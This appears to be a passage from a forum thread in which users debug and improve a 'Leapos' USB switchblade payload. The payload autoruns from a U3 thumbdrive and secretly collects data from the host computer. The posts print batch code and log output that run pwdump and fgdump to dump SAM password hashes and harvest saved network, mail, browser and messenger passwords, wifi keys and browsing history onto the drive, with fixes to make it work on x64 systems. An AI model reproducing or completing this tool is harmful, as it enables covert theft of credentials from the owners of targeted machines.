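IF %vernum% GEQ 501 SET netstatopts=-anb

:: --- Run with the derived options, logging the decision first so a
:: wrong guess is visible in the log next to the tool's output.
ECHO Detected Windows %vermajor%.%verminor% (%arch%) >> %log% 2>&1
ECHO pwdump options: [%pwdumpopts%]  fgdump options: [%fgdumpopts%]  netstat options: [%netstatopts%] >> %log% 2>&1
IF EXIST .\pwdump.exe .\pwdump.exe %pwdumpopts% 127.0.0.1 >> %log% 2>&1
IF EXIST .\fgdump.exe .\fgdump.exe %fgdumpopts% >> %log% 2>&1
netstat %netstatopts% >> %log% 2>&1
```

The two lines that matter are the PROCESSOR_ARCHITEW6432 check and the -O override: without the first, a 32-bit cmd.exe on an x64 box looks like a 32-bit machine, and without the second fgdump falls back to 32-bit on exactly the machines where that is wrong.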
  18. Ummmm..... Minor one that's been bothering me....

:: Header information
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO Leapos Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

Shouldn't that first long line have two ">" before the %log%??? Yeah, I know... It's just that I fix it every time :)

< edit > Ignore this, it's supposed to only have one >
  19. This just in, On my laptop running non-x64 XP I get an exception fault when FGdump runs and I get nine "No Disk" errors when Network services runs... When I get home I'll try network services without the "b" option (had problems with that before)
  20. Are you allowing the payload to execute automatically when you insert the thumbdrive, selecting "run payload" from menu.bat, or running start.bat directly from a dos prompt? When I'm testing I do the first. I found the second had problems. And the third won't work because start.bat is expecting parameters to be passed to it from go.vbs.
  21. Are you running the U3 version, or the non-U3 version? Could you post a bit of the generated log file? Say a half dozen lines before and after the error occurs.
  22. Just noticed this... With everything turned on except pwdump and the installers I only get one window popping up that says: "Windows cannot find '.\csrss.exe'. Make sure you typed the name correctly (yada yada yada)" and it wants me to click ok. csrss.bat is there, it appears that csrss.exe is not. Might wanna check on that one.
  23. Ok, found a couple good ones....

First off... At the top of start.bat you have

CD /SYSTEM

Then a little farther down you have:

:: Sets Variables and paths to clean up pathnames later on
IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
SET logdir="%flshdrv%\LOGS\%computername%
SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\SYSTEM\")
SET config="%flshdrv%\CONFIG\"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET scriptdir="%flshdrv%\SYSTEM\PROGS\SCRIPT\") ELSE (SET scriptdir=".\SYSTEM\PROGS\SCRIPT\")
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\SYSTEM\INSTALL\")
SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg"
SET U3="%cd%

First, scriptdir isn't used any more, so delete that line.

Second, seeing we're already CDed to \SYSTEM, the lines setting progdir and installdir shouldn't have \system in them in the "else" part of the line. They should read as:

IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\")
SET config="%flshdrv%\CONFIG\"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\")

This change made all kinds of things start working.

Also,

IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Port Scan] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\portqry -local -l %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
:SkipPortScan
ECHO. >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

Port Scan hangs for me every time. I checked the docs on portqry and found that we don't need to use the templog copy. I changed it to read as:

IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Port Scan] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\portqry -local -v -v >> %log% 2>&1
:SkipPortScan
DEL /f /q %tmplog% >NUL
ECHO. >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

added "-v -v" for maximum verbosity and moved the DEL tmplog to the bottom to clean that file out (it was still remaining from time to time)

I notice several items hard code .\ instead of using progdir. It doesn't matter for my U3 drives, but that might give you a bit of trouble on your non-U3 ones. (no clue on that as I'm not using non-U3)

I still have a couple individual items not running, but this is on my x64 machine. I'll try them on my non-x64 machines and report back tomorrow. Later y'all :)
  24. Ok, v0860... Heeeeere we go.....

I found out that PWDump requires a command line option to be set if you're running on an x64 operating system. (something like -O64) I've disabled it on my switchblades seeing I work with a mix of x64 and non x64 machines.

+----------------------------------+
+ [Dump URL History] +
+----------------------------------+
Input Error: Can not find script file "M:\SYSTEM\SYSTEM\DUH.vbs".

Hmmm...

ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump URL History] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CSCRIPT //nologo %progdir%\DUH.vbs >> %log% 2>&1

That should work ok...

IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\SYSTEM\")

come to think of it, I have a bunch of things not working...

+----------------------------------+
+ [External IP] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Wifi Hex] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump SAM FGDUMP] +
+----------------------------------+
Access is denied.

-----Hashes-----

-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Network PW] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Mail PW] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Firefox PW] +
+----------------------------------+
The system cannot find the path specified.
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump IE PW] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Messenger PW] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Cache] +
+----------------------------------+
The system cannot find the path specified.
-----------------------------------------------------------------------------------------------------------------------------

and port scan isn't functioning, either. going to work on it some.
  25. That may be it right there. I'm playing with the U3 version exclusively. I just downloaded your most recent update. I'll be trying it shortly.